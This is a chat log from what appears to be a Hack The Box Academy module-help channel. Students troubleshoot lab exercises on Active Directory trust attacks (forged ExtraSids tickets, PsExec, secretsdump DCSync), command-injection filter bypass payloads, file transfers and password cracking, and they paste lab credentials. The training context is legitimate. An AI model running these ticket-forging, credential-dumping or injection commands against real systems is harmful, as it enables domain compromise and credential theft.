Color it with the blood of your enemies

#

And good luck on your report

alpine mural
shut wraith
#

BRO

gray yacht
shut wraith
#

This is the kind of stuff i never get to learn

#

Because companies dont have Discord

#

They only have Active Directory and Azure

#

And GCP

gray yacht
#

This channel is for modules content. Feel free to move your discussion to #general

#

Contact discord support and refrain from discussing this any further in this channel. If your post was deleted, it was because it doesn't pertain to any HTB academy modules.

cloud urchin
#

@lyric beacon As @cunning canopy said this is not the server for that. We do not condone illegal activity.

eternal night
cloud urchin
#

@eternal night You need to verify your account, follow the instructions in #welcome

eternal night
#

Oh ok

#

Thanks

alpine mural
ocean flower
#

hi i want to ask in password attacks skill assesment do i need at the first username-anarchy ?

shut wraith
#

Can u share resources

#

I mean aside common phishing techniques

brave field
#

In the Active Directory Enumeration & Attacks module and Attacking Domain Trusts - Child -> Parent Trusts - from Linux section, why is the IP of child domain provided when we have to attack from linux attackhost which is connected to the internal subnet that contains the domains. Also, it states SSH into the child domain whereas there is no ssh port open there. Thanks.

cloud urchin
#

It says to ssh into the attacker machine

spice sequoia
#

for the module "Automating Payloads & Delivery with Metasploit" the question says to Authenticate to 10.129.69.251 (ACADEMY-SHELLS-WIN10MSF) with user "htb-student" and password "HTB_@cademy_stdnt!"
tried to ssh but it doesnt work, how should i go anout doing this?

solid mirage
cloud urchin
#

network issue

spice sequoia
#

thkss a lot

brave field
spice sequoia
#

somehow it still doesnt work

cloud urchin
cloud urchin
spice sequoia
cloud urchin
#

can you ping the target

spice sequoia
brave field
cloud urchin
cloud urchin
cloud urchin
cloud urchin
# spice sequoia yes

So you have a shell then. What's the issue finding the answer to the 2nd question?

spice sequoia
spice sequoia
cloud urchin
brave field
cloud urchin
#

The IP is provided so it makes it easier so you don't have to find it yourself? not sure

spice sequoia
cloud urchin
#

Could also try changing servers or regions if need be

spice sequoia
#

Okk lemme try

brave field
cloud urchin
brave field
cloud urchin
brave field
cloud urchin
#

the line after the comma is the IP of DC02

brave field
quartz sundial
#

hi! please help with module https://academy.hackthebox.com/module/143/section/1457

I'm going through the material again, checking various exploitation methods after receiving a parent domain ticket.

so, I managed to get a ticket and execute ls \\...\c$. then I try to configure DCSync using mimikatz, specifying the precision of the command in the module, and I get an error.

how to fix the problem?

cloud urchin
cloud urchin
brave field
quartz sundial
quartz sundial
# cloud urchin Read the last part of the section

I can try to request the command line through PsExec using my ticket. I read in the Internet that it should work like that. But it doesn't let me in. same thing, I can't do Enter-PSSession. that is, I can only do DCSync?

cloud urchin
#

Idk. Looks like you made the user yourself, so they'll have perms to whatever you gave them

quartz sundial
#

I didn't create the user, it's a non-existent hacker user, for ExtraSids Attack

brave field
quartz sundial
#

I want, as in the next module, to get an interactive shell from Windows on the parent domain controller using the received ticket, at least somehow: .\PsExec (PsTools) or .\PsExec (Impachet) or Enter-PSSession ...

knotty granite
quartz sundial
# knotty granite I’d say specify the FQDN and shuffle it around if all params are already correct...

hi @knotty granite !

I am trying to perform ExtraSids Attack from module https://academy.hackthebox.com/module/143/section/1457. on the following page https://academy.hackthebox.com/module/143/section/1508, when attacking from Linux, psexec from Impacket is used. There is a non-existent user hacker used there

# PsExec (PsTools)
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local -u LOGISTICS\hacker cmd.exe
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local cmd /c "whoami /all"

# PsExec (Impacket)
.\psexec.exe  \\academy-ea-dc01.inlanefreight.local
.\psexec.exe LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

# Enter-PSSession (Powershell)
Enter-PSSession -ComputerName academy-ea-dc01.inlanefreight.local

in all cases i failed. the ticket is valid, I can success do ls \\academy-ea-dc01.inlanefreight.local\c$

the goal is simple - get an interactive shell on the parent domain controller from Windows host, using ticket, got after ExtraSids Attack

knotty granite
quartz sundial
knotty granite
topaz tundra
#

Guys I have an issue in the bash script module

#

GNU nano 8.4 log.sh
#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)

            #<---- If condition here:

if [[ $var == $value ]]
then
echo "Var is equal to value"
else
echo "Var isn't equal to value"
fi
if [[ ${#var} -gt 113450 ]]
then
echo -n "$var" | tail -c 20
else
:
fi
done

This is my script for the Comparison Operators exercise what can I modify it ?

knotty granite
topaz tundra
#

It provides me a value but htb says it isn't the right answer

knotty granite
# topaz tundra GNU nano 8.4 ...

Well the script can be improved that’s one thing I do know because I never done this module but I’ll try to help as best as I can

Add quotes to the variables that are in your if conditions

Maybe also try printing out your variables when saying “var isn’t equal to value”

quartz sundial
knotty granite
quartz sundial
# knotty granite Oh no it’s a real attack. My apologies for the confusion. What I meant was I’ve ...

okay

I came across a similar question on the htb forum, the person also received a TGT ticket and was unable to execute PsExec. It would be good to have such a skill in own arsenal, since in complex networks it may not always be possible to perform terminal from own Linux host

https://forum.hackthebox.com/t/ad-trusts-modules-psexec-access-is-denied/312552

#

yeesss

I finally succeeded. I don't know what happened, but I succeeded.

brave field
quartz sundial
# brave field How did you achieve it? Share please.

I was able to connect to the interactive shell through PsExec (PsTools). Before executing the command, it is better to refresh TGT once again

.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd /c "whoami /all"

failed to connect via PSSession. at the moment, it seems to me, the problem is in the infrastructure settings. here I found an example where in the same situation the connection is successful https://academy.hackthebox.com/module/253/section/2812

Here is the explanation I found for myself in this problem. but I am not sure if it is correct:

The fake TGT that was received has a PAC, but the SID may not map correctly on the target host for WinRM, so WinRM refuses to create a PowerShell session with the error

I have now a test laboratory from the CRTA certification, and active academy infra from the OSCP, as well as two examples from HTB. all labs on the topic AD Trust (attack parrent DC from child). so the research is still ongoing))

brave field
quartz sundial
ocean flower
#

Skills Assessment - Password Attacks
aftert username anarchy how to pivot ?

opal shuttle
quartz sundial
opal shuttle
opal shuttle
#

I have done that assessment

#

But i dont remember exactly

#

You can dm me

ripe zodiac
#

Guys, I tried since 1 hour to get the flag on the Firewall IDS/IPS medium labs, and just checked the solution, and even using the command provided it doesn't show the flag ! How is this possible ?
Section link https://academy.hackthebox.com/module/19/section/118

dense lava
#

I am having some issues SSH'ing into windows machines, found on the trust attacks modules. The first windows machine i.e. the SQL01 one is fine to ssh into, but all others no matter through proxychains or ligolo only allow a certain amount of lines then will repeat output on the last line, so i cant ready ANY command output as its just immediately replaced with the next line, and finally just the prompt for c:\tools or wherever im at. I find what i'm having to do is remotely execute reverse shells on each one back through my ligolo listener, but this is tedious and from time to time i ctrl+c on the wrong window and lose my listener chain. Does anyone have any solution to the SSH issue?

cloud urchin
#

I think I remember running into that issue and used the Pwnbox which didn't have the problem. I could be remembering a different thing than you're working on though because I don't remember the specific module.

dense lava
#

Thats what it looks like, I don't have to want to use pwnbox its already slow enough from Australia

cloud urchin
#

Yeah the pwnbox should do it. I remember trying to log the output of the command but it was messed up too, but you could try that.

dense lava
#

rather chain revshells tbh

last musk
#

for the cpts exam would you recommend doing it on the pwnbox or on your own vm?

cloud urchin
#

vm

quartz sundial
# brave field That's awesome, keep us updated. Thanks.

there are interesting updates😄

I'm looking at another infrastructure, the exploitation of ExtraSids Attack is different a little. I exploit it from Linux, and there I can't create a valid TGT token through a non-existent user. The writeup says that I need to use an existing user and his id. And also specify the parameter -groups 516 -user-id <real_id_of_real_user>. Also in the parameter -extra-sid I need to add this to the sid for Enterprise Admins: ,S-1-5-9

I don't understand why this is so. Any ideas?

last musk
cloud urchin
#

better experience, tools already available, etc

fading iron
#

Hey i have a question, i had a 44 weeks streak and i lost them this week due to traveling conditions is there anyway support can return them back ??

cloud urchin
#

No probably not. Only support can answer, but I highly doubt they can/will do it.

fading iron
#

Can i give it a try they might understand

cloud urchin
#

Nothing stopping you from trying

silver ocean
#

can someone please tell me how to add coloured text in code segment in the report via sysreptor....

autumn pilot
#

No, we can't

quiet trout
#

nvm im dumb

#

nvm no im not. im only half dumb if someone HAS done the box i'd like to understand how it was expected of us to make a leap in logic that i eventually got to, to find the box...

pastel saddle
#

Hit me up

quiet trout
#

or do they just purposely leave a breadcrumb but its like half ass-ish?

quartz sundial
# brave field That's awesome, keep us updated. Thanks.

I continue testing that otherinfra. In general, it turned out that in the attack it is necessary to specify a real username, and also add a parameter with userid. Otherwise, the attack is identical

In the material on HTB it is written that the user name can be specified randomly. As it seems to me, this does not always work like that

brave field
grand timber
#

Im seriously confused by this module idk what im doing wrong, anyone open to help out,

brave field
quartz sundial
brave field
#

Maybe some extra validations are in place on PAC by the DC which doesn't let a non-existent account forge TGT. Just my opinion though.

proper hornet
#

Is there anyone I can ask about the API Attacks Module "Broken Object Property Level Authorization" Area. I'm going crazy.

north frigate
#

Cheers!

In the module "pentesting in a nutshell" -> Section "Windows System enumeration" I've now tried several times to get the winpeas.ps1 file from my atacking machine onto the windows target machine via RDP + powershell (as provided in the course). but the actual "get"-command (or its windows equivalent)seems to fail constantly. Does anyone else experience this? 🙂

knotty granite
autumn pilot
near orchid
#

hey i am doing the vulnerability assessment module, i have the openVPN running the academy regular. once i connect to the greenbone security assistant through firefox i have a about 2 minutes and then it disconnects me, this makes running the assignment a drag

#

is this a hackthebox server issue thing ??

quartz sundial
north frigate
# autumn pilot Can you show an example of the error message

no error, the python-server evven shows the status code 200 :D. on the target machine the ps-command simply takes forever. IF i mispell the file, it instantly provides the problem, but if I do it correctly, its stuck. I've tried pwnbox AND VPN (with kali linux in this case):

tired dagger
#

Hi

autumn pilot
#

Try with the following, instead of invoking it as an expression:

C:\> iwr -uri http://10.10.14.200:8080/winPEAS.ps1 -o winpeas.ps1
C:\> . .\winpeas.ps1
tired dagger
#

Can someone give me role so i can write in #general i need support help related to billing and my account

north frigate
#

(well, to be fair: I still cannot get the System Information section....maybe thats a hint towards the root of my initial problem?

tired dagger
autumn pilot
tired dagger
#

When i try to contact

compact patrolBOT
terse bloom
#

Is it just me or a pivoting module requires the honorable mention of ligolo? I have finished some tasks without extra steps provided in the module because ligolo is like VPN, not HTTPs or anything

rich obsidian
#

When you guys pipx install a python tool, and that tool needs root privileges to execute, do you guys just create an alias that calls sudo with the absolute path of the binary instead of installing the tool in the roots local bin PATH AND the user's local bin that you are using? Or maybe there is even a solution for this problem that I am unaware of? The only reason I ask is because putting my user's local bin in root's PATH seems like it would be a security concern and double downloading the tool to both also seems like a poor idea for management later.

knotty granite
gray yacht
dense lava
#

That's a good idea, I think I'm past it now but thankyou

north frigate
brave field
# north frigate

Are you trying to save the file to the disk or run it in-memory? Also, you're already in powershell so no need to write powershell in the command.

north frigate
#

so I'm nont sure how to answer your first question 😄

north frigate
#

this has the issue, right? Already being in powershell but still explicitly using the "powershell" command

near breach
#

hi everyone
I'm trying to add a script to zap to use it in fuzzer, but it doesn't work
if I run fuzzer with a custom script, the progress bar just doesn't move and stays at 0%
can you tell me if there are any special conditions for the script?
here's my script:

import base64
def processPayload(value):
    b64 = base64.b64encode(value.encode('utf-8'))
    return b64.hex()

and secod question:
I don't really understand the third task in Skills Assessment - Using Web Proxies
I made a script that substitutes the last character in cookies, encrypts and sends, but the response from the server is the same everywhere
how do I know that I have selected the correct cookie?

brave field
#

If you review the file winpeas.txt, you'll see the result of the script winPEAS.ps1.

north frigate
lucid light
#

im currently on Linux Fundamentals : User Management were it teaches about creating users and such, it's telling me to test this out on the target system, but the "htb-student" user cant use sudo? and dose not have perms to create users? am i missing something? every time i try its just telling me that i'm now reported haha. help.

knotty granite
lucid light
grand timber
signal apex
#

Just bought the silver 🥈 annual...

brave field
grand timber
last musk
grand timber
#

Thank you!

cinder lion
#

I am looking for some help in Active Directory Penetration Tester Path: Windows Lateral Movement - Skill assessment - Q2. Found the DC but still can't get into Arturo account.

weak vapor
#

anyone here did/is doing Linux Fundamentals module?

rich obsidian
#

File Transfer module, wsgidav usage, I managed to figure out I could just request the exact file I wanted in the exact folder I specify using powershell, but I was never able to actually make the shell command dir \\<attacker-IP>\DavWWWRoot work like they explained in the module. I keep getting the Network path was not found error. Same with copy even if I specify the exact location without DavWWWRoot copy \\<attacker-IP>\testfile.txt I know connections can be made because this syntax to get the file works perfectly with Invoke-WebRequest on powershell. What am I missing?

crystal cove
#

Hi Chat, in PKI - ESC1, of Windows Attacks & Defense, how are you copy pasting the certificate ? I tried both using vim or nano to create the cert.pem file with the output of the certify command (with both the certificate and the key), then i parse it with sed, then use openssl to transform it in an cert.pfx. But when i use rubeus with the cert.pdf i get a "KDC_ERR_PADATA_TYPE_NOSUPP" error instead of "you did it you beautiful"

left lintel
potent wigeon
silent kindle
#

anyone else having trouble doing rdp? I get this error

leaden island
#

yo guys im on AD enum, attacking domain trusts child->parent from linux (aka golden ticket)

#

ive forged a ticket with the enterprise admin's SID passed as SID history parameter using ticketer.py

#

and now i want to dump nt hash from the bross user

#

im using this

└──╼ $secretsdump.py inlanefreight.local/yosef@172.16.5.240 -k -no-pass -just-dc-user bross
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
#

but i think im doing something wrong

silent kindle
teal arrow
#

hey team, I'm just now learning about eyewitness in the modules, from my understanding it's limited to application discovery, how do you guys use it?

hallow iris
#

Is the Code box broken?

dull solar
lucid light
red cypress
red cypress
red cypress
ripe zodiac
#

pwnbox horribly slow no ?

quiet trout
silent kindle
#

let me try in vm'

red cypress
quiet trout
#

yes xfreerdp from pwnbox in browser is slow this has mostly always been the case tho when ive used it

red cypress
#

what command you are using..
ideally it should be something like
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.151.78 /cert:ignore

silent kindle
#

doesnt work in vm too

#

lemme try yours

red cypress
#

i think cert ignore is important which probably you're missing because of which you're getting untrusted tls error

red cypress
# silent kindle no luck

it says NLA failed now this is a differnet error than before if you notice, i would suggest just try to reset the target box and try again if not, ensure the correct passwords are being put..

reef axle
#

Hello all i need some advice, I've completed my BBH path around 80%, and the modules being removed are remaining, as im planning to take CWSE exam, should i skip those and continue these modules?

New modules:

  • Web Fuzzing
  • API Attacks
  • Attacking GraphQL
  • Attacking Common Applications

Removed modules:

  • Web Service & API Attacks
  • Session Security
  • Hacking WordPress
woven storm
#

Hi, I was doing Advanced Command Obfuscation section of Command Injection module i am really stuck at this module. I've been trying to bypass it for a while. this is what i have done till now
i ran 127.0.0.1%0a{t'ai'l,index.php} which did return ?> means i have successfully bypassed t'ai'l similarly g're'p .only thing left was to bypass | , HTB mentions that use <<< instead of | this is what i did
ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09"input"%09index.php) it was fine until here but when i run to command below to test a nested grep command it it is not displaying any output other than ping results ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09mysql<<<$(g're'p%09"input"%09index.php)) i also tried with "$(g're'p%09mysql<<<"$(g're'p%09"input"%09index.php)")" please help me if i am missing something obvious or if i am on a wrong path

quiet trout
#

im doing an assessment right now and i have one user who works just fine xfreerdp, trying a different and password fails

#

likely because ih ave the wrong password, im getting an ssl cert error

vivid wagon
#

so im in the HTB setting up process, exploring the terminal emulator and i am using wavelength (or rather on that section) i go to open bashrc and the file doesnt exist nor will it let me source or create one?

#

any help would be so much appreciated, extremely new to this

quiet trout
knotty granite
vivid wagon
#

optional 🙂 just trying to wrap my head around all of this (this is going to be my future) lol

#

and i am trying to understand just about everything i can before i start school in october

somber bison
#

Anyone know a module with airgeddon

maiden kestrel
#

Need help With DACL Attacks II Skills Assessment Q3.

I have NTLM hashes for all users. Passwords for all users except t****i. I need a nudge in the right direction to get to the last flag, if any one has completed this.

Nevermind I managed to figure it out 😅

cloud urchin
somber bison
cloud urchin
knotty granite
vivid wagon
#

understood! thank you @knotty granite

rich obsidian
woven storm
quiet trout
quiet trout
#

EOF terminator

woven storm
#

I did ask chatgpt and claude @quiet trout

harsh sundial
#

Hello everyone i on the footprinting module at the smtp part. I am using metasploit's smtp enumeration script with the file that is given in the resources. But i don't get any results and i don't get why

rich obsidian
quiet trout
#

can you dm me a screenshot?

quiet trout
quiet trout
harsh sundial
#

i think i am doing the right thing but i get no results so i am confused

quiet trout
#

oh right to enum

#

i used the smtp-user-enum binary mentioned in the module

harsh sundial
#

oh i will check that out then but i would think this would work too haha thanks anyway

torn halo
#

its not working only for me?: " If we hover the mouse over the respective options, a small window will appear with an explanation. These explanations will also be found in other modules, which should help us if we are not yet familiar with one of the tools."

quiet trout
harsh sundial
#

now i got it i am so sorry for wasting your time have a good one 😅

rich obsidian
rich obsidian
plain pollen
#

Hi, anyone who has completed the Skills Assessment - Password Attacks, I'm stuck near the end, I think, and I don't know what to do with the user stom.

rustic sage
#

Anyone who HAS the CPTS were the modules enough to prepare you?

cloud urchin
#

absolutely

rustic sage
#

thanks

#

any order I should do the modules or just go with there order

cloud urchin
#

go in order

rustic sage
#

i saw the last one was note taking though

#

seems odd

cloud urchin
#

no, the last one is AEN which is the capstone. the 2nd to last is documentation and reporting, which is about how to write up a report and document findings, not about note taking

#

you're free to take them in any order you want, but some of the modules build off of previous knowledge

plucky brook
#

Hi! Can someone help me with the Advanced XSS and CSRF Exploitation Skills Assessment? I am stuck with File Upload, I am moderator

lime cosmos
#

Active Directory Enumeration & Attacks : DCSync
Scenario Setup

In this section, we will move back and forth between a Windows and Linux attack host as we work through the various examples. You can spawn the hosts for this section at the end of this section and RDP into the MS01 Windows attack host with the credentials htb-student:Academy_student_AD!. For the portion of this section that requires interaction from a Linux host (secretsdump.py) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!. This could also likely be done all from Windows using a version of secretsdump.exe compiled for Windows as there are several GitHub repos of the Impacket toolkit compiled for Windows, or you can do that as a side challenge.

#

password wrong idk why

frigid kindle
#

I am new on this. Recommend where to start. Basics for a beginner

compact patrolBOT
atomic trout
#

.

#

Reason why General is inaccessible for new users?

cloud urchin
atomic trout
#

Cheers will take a look 👍🏻

knotty tulip
#

.

atomic trout
#

Hmm account sign up, will look later 👀

knotty tulip
#

I don't speak much English

atomic trout
#

Language?

knotty tulip
atomic trout
#

Comment va votre soirée?

cloud urchin
#

English only please

atomic trout
#

ah ok no problem

cloud urchin
#

Also this isn't #general, this channel is for discussion of the modules on Academy. Please take the general convo there.

atomic trout
#

Have this real time translator im trying out, thought I'd test a new language. Haha lol, haven't sorted my general out 😉. I get you though 👌🏻, you guys have a nice evening

quiet trout
finite shadow
#

I have a question why can't I use the VIP machines, and I have the VIP plan?

cloud urchin
#

You'd have to ask support on the website, no support is provided on Discord

finite shadow
#

All good, but those guys aren't answering.

foggy snow
#

Hey! currently doing the Job Role path in preparation for the exam, I am currently doing the skill assessment within "Attacking Common Services" however I really struggled with the "easy" one and even needed a peek at the solution. It is kinda demotivating to me that I still can't do an easy skill assessment without needing a nudge. Any advice?

quiet trout
fathom pendant
#

My major contention with the annual writeups is they dont generally lead you to discover the solution

#

A -> C while not showing B

#

Methodology is probably the key most thing for learning

lime cosmos
#

i rdp to

#

Active Directory Enumeration & Attacks : DCSync
i rdp to the MS01 and sSSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! but i get pass wrong

#

so i think the problem in HTB hosts setup

fathom pendant
# lime cosmos

How are you trying to paste? In powershell, paste is just ctrl+v

lime cosmos
#

yes CTRL + v

#

if u see in the pic i test the paste of the password

#

i also update my vpn config + downlaod new one . reset the machine and try again but same problem

fathom pendant
#

Try a different vpn region?

lime cosmos
#

ok

#

not work

#

i will use windows impacket compiled bins as alternative so no need for linux host

acoustic owl
#

Which module are you working in?

lime cosmos
#

pivoting using a socks proxy when config the burp using that proxy . proxy >> setting proxy >> connection >> socks

#

use ligolo-ng for better

rustic sage
#

And when you have 4/5 host? In different subnets? How you can manage it?

lime cosmos
#

mm i will send u my notes .

#

dm

shut wraith
#

I'm officially almost giving up on the sliver module

thin dew
#

Hey, was away from my computer for the weekend. Yes, I am! Could I DM?

harsh gorge
knotty tulip
fathom pendant
knotty tulip
atomic trout
fathom pendant
#

It's in the #rules ; this is a primarily english server

atomic trout
#

Hence me saying it causes upset lol. I'm a rule abiding member fingerguns

quiet trout
#

nvm i was stuck on stupid i had all i needed it was just organized in a manner to throw me off

quiet trout
#

did you get yourws sorted?

opaque gulch
#

Can anyone help me with Password Attacks John The Ripper second question

john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Loaded 2 password hashes with no different salts (LM [DES 128/128 SSE2])
Warning: poor OpenMP scalability for this hash type, consider --fork=12
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 100% 0g/s 6870Kp/s 6870Kc/s 13741KC/s (JESTER..*7¡V
Session completed

This is what I get as a response
Using the format also does not help

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 hash 
Unknown ciphertext format name requested

the hash file contains the given hash:
193069ceb0461e1d40d216e32c79c704

proven plinth
gritty rover
#

Can you give me some advice, I'm going through the SQL Injection Fundamentals | reading files module, I got to the test task, but I don't understand what actions are required of me there.

We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

brave field
# lime cosmos i rdp to

Ctrl+V gives the same error to me as well. Use mouse right click or manually type the password.

cloud urchin
#

best to say which section/question you're on

gritty rover
# cloud urchin best to say which section/question you're on

I got to the output of the php file
`<?php
if (isset($_GET["port_code"])) {
$q = "Select * from ports where code like '%".$_GET["port_code"]."%'";

$result = mysqli_query($conn,$q);
if (!$result)
{
die("</table></div><p style='font-size: 15px'>".mysqli_error($conn)."</p>");
}
while($row = mysqli_fetch_array($result))
{
echo "<tr><td style="width:400px" colspan=3>".$row[1]."</td><td style="width:400px" colspan=3>".$row[2]."</td><td style="width:450px" colspan=3>".$row[3]."</tr>";
}
}
?>`

After which the task says:

We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

I don't understand what is required of me.

cloud urchin
#

always say the section you're on along with the module and question

gritty rover
cloud urchin
#

I don't think you have the right file

#

Thre should be a lot more in the source, look for the php file it calls to

#

you are only showing the very bottom of the page (i don't need to see it) just review the entire source code

ionic sable
#

...

cloud urchin
#

@gritty rover Good job. Deleted your post though as it contained the answer on how to solve the question.

humble hound
#

how am i supposed to complete modules if i cant even spawn stuff? oh can directly access them

brave field
woven storm
#

i am stuck at advanced command obfuscation section of command injections module this is what i have done till now
ip=127.0.0.1%0at'ai'l<<<"$(g're'p%09mysql<<<"$(g're'p%09root<<<"$(${PATH:0:1}usr${PATH:0:1}share)")")" is this payload is equivalent to tail -n 1 <<< grep mysql <<< grep root << /usr/share for the context i have to run this command /usr/share/ | grep root | grep mysql | tail -n 1 the thing is grep, tail and | are blocked. grep is working after g're'p so did t'ai'l . htb suggest to use <<< instead of |

Tip: Note that we are using <<< to avoid using a pipe |, which is a filtered character.

but to work with <<< we have to use tail first ig to everything needs to reverse this is how grep should have worked in this command? note that i have use t'ai'l not t'ai'l%09-n%091 because it is adding unnecessary filter if i get the results of tail i'll add filter later

i also tried base64 encoding
ip=127.0.0.1%0a$bash<<<$(base64%09-d<<<dCdhaSdsPDw8IiQoZydyZSdwJTA5cm9vdDw8PCIkKGcncmUncCUwOW15c3FsPDw8IiQobHMsJHtQQVRIOjA6MX11c3Ike1BBVEg6MDoxfXNoYXJlKSIpIiki) this outputs invalid output while above one gave ping results

i did even tried reversing command
127.0.0.1%0a$(rev<<<'")")")erahs}1:0:HTAP{$rsu}1:0:HTAP{$,sl($"<<<lqsym90%p"er"g($"<<<toor90%p"er"g($"<<<l"ia"t') but no results

even tried encoding the above command
ip=127.0.0.1%0a$bash<<<$(base64%09-d<<<JChyZXY8PDwnIikiKSIpZXJhaHN9MTowOkhUQVB7JHJzdX0xOjA6SFRBUHskLHNsKCQiPDw8bHFzeW05MCVwImVyImcoJCI8PDx0b29yOTAlcCJlciJnKCQiPDw8bCJpYSJ0Jyk=)
but no results

woven storm
gritty rover
#

I am taking the Skills Assessment - SQL Injection Fundamentals. The thing is that I have passed the final task, but I cannot understand why:

"Can't create/write to file '/var/www/html/proof.txt' (Errcode: 13 "Permission denied")"

however, if I create "/var/www/html/dashboard/shell.php" and get access, I can write, although the database user is root.
and whoami in the shell shows the user www-data,
is it really set up so that the root user has access only to the directory and subdirectories of "/var/www/html/dashboard/", and the www-data user has access to the root directory, am I right?

woven storm
hardy otter
#

Has anyone done the OutBound machine root flag?

fathom pendant
fathom pendant
#

@royal jetty

  1. don't spoil module information
  2. it's expecting the answer in the format of sub1 sub2 sub3 without the domain
brave field
storm elk
#

It's not outdated completely, it still holds value imo

brave field
storm elk
#

I know as much as in the blog post 🙂

torn fiber
#

Module name: Password attack
sub module: Credential Hunting in Network Shares

both question:

q1: One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

methods i have tried:

method no1. docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider 10.129.234.121 -c 'passw' -u 'mendres' -p 'Inlanefreight2025!'

i tried this it did work but took a really long time to process and cancled it mid way. and moved towards method no2 that i tried.

method no2. PS C:\Users\Public\PowerHuntShares> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public

i did not saw anything that was helpfull from this html it gave.

Again i did try c:\Users\Public>Snaffler.exe -s but i did not had Snaffler.exe i tried create one from repo snaffler.sln but faile and having a hard time without Snaffler.exe.

I would really appreciate help i am hard stuck on this sub module.

coarse leaf
woven storm
#

have anyone completed command injections module?

fathom pendant
fathom pendant
woven storm
woven storm
fathom pendant
woven storm
fathom pendant
woven storm
woven storm
fathom pendant
#

"$(g're'p%09mysql<<<"$(g're'p%09"invalid"%09index.php)")" gets split up into:
"$(g're'p%09mysql<<<"
$(g're'p%09
"invalid"
%09index.php)
")"
(I broke it up by ")

coarse leaf
woven storm
#

i don't think that the case i have tried without " too

storm elk
fathom pendant
woven storm
fathom pendant
#

the module is above tier 0; so no

#

don't share all your payloads

#

my dms currently aren't open, trying to maintain some semblance of normalcy.

coarse leaf
storm elk
#

yes @coarse leaf feel free to dm me

woven storm
storm elk
#

thanks for asking first

woven storm
fathom pendant
#

you don't need to do any kind of encoding for the base command, the b64 already bypasses it

woven storm
#

my main problem if i am not sure if i am using <<< correctly with grep

fathom pendant
#

you might be getting very caught up on using grep

#

grep just reads files (or input)

granite apex
#

Hi 👋 I am new in this field can u guys guide me

compact patrolBOT
granite apex
#

Thanks

fathom pendant
#

i.e.
ls | grep "thing" greps for "thing" from the stdout of ls

woven storm
fathom pendant
#

it's not like someone sent the entire bee movie script and bumped your message out the way

woven storm
fathom pendant
#

just have some patience, even if it's been pushed back before

#

mods aren't staff, and we're volunteers in the community. We help as we can

woven storm
#

okay chill i was joking gng

fathom pendant
#

met enough people that aren't ¯_(ツ)_/¯

woven storm
#

i think i should figure out everything if this is right

woven storm
fathom pendant
woven storm
#

oh wait i never focused on find lol sorry anyways f'in'd this should do the work

fathom pendant
#

you don't need to nest them within each other like $(command <<< $(command <<< $(command) <<< $(command))))

woven storm
woven storm
#

<<<grep mysql <<< grep root

#

ah

#

tail <<< grep mysql <<< grep root <<< {f'in'd,...} right? let me try

fathom pendant
#

consider you're telling the previous command in each chain "here is what you're looking at"

#

using an expected payload (with base64 -d) it worked just fine

#

you don't need to encode the initial payload you're encoding with base64

#

the base64 encoding in and of itself is a bypass

south hound
#

Hi all,

I'm doing Web Attacks - Bypassing Encoded References. I don't see any requests or parameter in Burp that contains the encoded string.

#

I don't see this request being made in Burp. Even after resetting the machine some times.

woven storm
fathom pendant
#

i'm willing to dm to talk you through the fix (i just spent some time tinkering through "Invalid input" errors

fathom pendant
#

g'r'ep

#

:)

#

it does need the $(cmd<<<$(cmd2<<<$(cmd3))) format

woven storm
#

what g're'p worked fine fr i checked it 😮 , i checked with g're'p%09"invalid"%09index.php

#

which gave me ?>

fathom pendant
#

not sure why you're trying to mess with index.php

woven storm
#

it greped invalid

woven storm
woven storm
#

it is not giving results now 😭

#

@fathom pendant can i dm you please i am creating a mess here

fathom pendant
#

not sure why you're messing with index.php ¯_(ツ)_/¯

woven storm
fathom pendant
#

just focus on the given goal

woven storm
#

because i want to check g're'p was working or not i don't find any file except index.php to try with

woven storm
digital lava
waxen totem
#

lets please keep this channel on topic

fathom pendant
#

localhost is generally always a host

woven storm
fathom pendant
#

(/var/www/html)

hybrid pilot
#

A little lost on the Password attacks modules skill assessment. I could need a nudge. I'm think I'm almost done but I seem to miss the point on how to proceed near the end

fathom pendant
#

not sure the mess you've created; i already told you the fix to your initial mess. btw i think it's filtering out the substring 'val'

#

nvm it's filtering the whole string "invalid" lol

woven storm
hybrid pilot
#

I'm at the part where I did the pivot from DMZ01 -> JUMP01 but I have a hard time figuring out what to do next.

#

ah nvm, I guess I was making it too complicated.. wow

dull solar
#

I was on the Linux Fundamentals Module - Section: Backup and Restore
What if you have a cronjob that runs the -delete option with rsync after your source directory has been wiped or something? And your backupserver also deletes everything there because the source is now empty.

#

Is there any way to circumvent that other than not including the -delete option in the rsync cronjob?

winged tulip
#

Hello

hoary gull
#

Hi everyone, are you also experiencing connectivity issues with the VM on the modules? Sometimes the services running on the VM randomly stop working, and I have to wait about 5 minutes before they start working again. I’ve tried resetting the VM, but the issue still happens :(

hazy lance
#

hello guys!

